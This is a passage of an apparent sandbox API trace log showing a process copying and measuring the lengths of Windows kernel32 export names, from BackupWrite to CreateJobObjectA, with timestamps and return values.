lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.662] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.662] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.662] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.662] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.662] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.663] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.663] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.663] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.663] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.663] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.663] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.663] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.663] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.663] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.663] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.663] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.663] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.663] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.663] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.663] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.663] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.663] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.663] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.663] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.664] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.664] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.664] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.664] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.664] lstrlenA (lpString="BEEP") returned 4 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.664] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.664] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.664] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.664] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.664] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.664] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.664] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.664] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.664] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.664] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.664] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.664] lstrlenA (lpString="CANCELIO") returned 8 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.664] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.665] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.665] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.665] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.665] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.665] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.665] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.665] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.665] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.665] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.665] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.665] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.665] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.665] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.665] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.665] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.665] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.665] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.665] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.665] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.666] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.666] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.666] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.666] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.666] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.666] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.666] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.666] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.666] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.666] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.666] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.666] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.666] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.666] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.666] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.666] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.666] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.666] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.666] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.667] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.667] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.667] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.667] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.667] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.667] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.667] lstrlenA (lpString="COPYFILEA") returned 9 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.667] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.667] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.667] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.667] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.667] lstrlenA (lpString="COPYFILEW") returned 9 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.667] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.667] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.667] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.667] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.667] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.667] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.668] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.668] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.668] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.668] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.668] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.668] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.668] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.668] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.668] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.668] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.668] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.668] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.668] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.668] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.669] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.669] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.669] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.669] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.669] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.669] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.669] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.669] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.669] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.669] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.669] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.669] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.669] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") 